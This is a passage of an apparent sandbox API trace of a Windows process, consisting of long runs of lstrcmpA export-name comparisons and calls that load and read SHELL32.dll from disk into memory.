[0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.693] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.694] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0109.695] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0109.695] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0109.695] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0109.696] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0109.696] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0109.697] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0113.768] GetProcessHeap () returned 0x480000 [0113.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4073040 | out: hHeap=0x480000) returned 1 [0113.994] GetProcessHeap () returned 0x480000 [0113.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499160 [0113.995] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0113.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0113.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0113.995] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0113.996] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0113.996] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0113.996] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0113.996] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0113.996] GetProcessHeap () returned 0x480000 [0113.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1587258) returned 0x4073040 [0114.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0114.327] ReadFile (in: hFile=0x140, lpBuffer=0x4073040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4073040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0119.123] CloseHandle (hObject=0x140) returned 1 [0119.123] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0119.124] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0119.124] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0119.124] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0119.124] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0119.124] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0119.124] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0119.124] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0119.124] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.124] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0119.124] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0119.124] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0119.124] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.124] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0119.124] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.125] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.125] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0119.125] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0119.126] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0119.127] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0119.127] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0119.128] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0119.129] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0119.136] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", 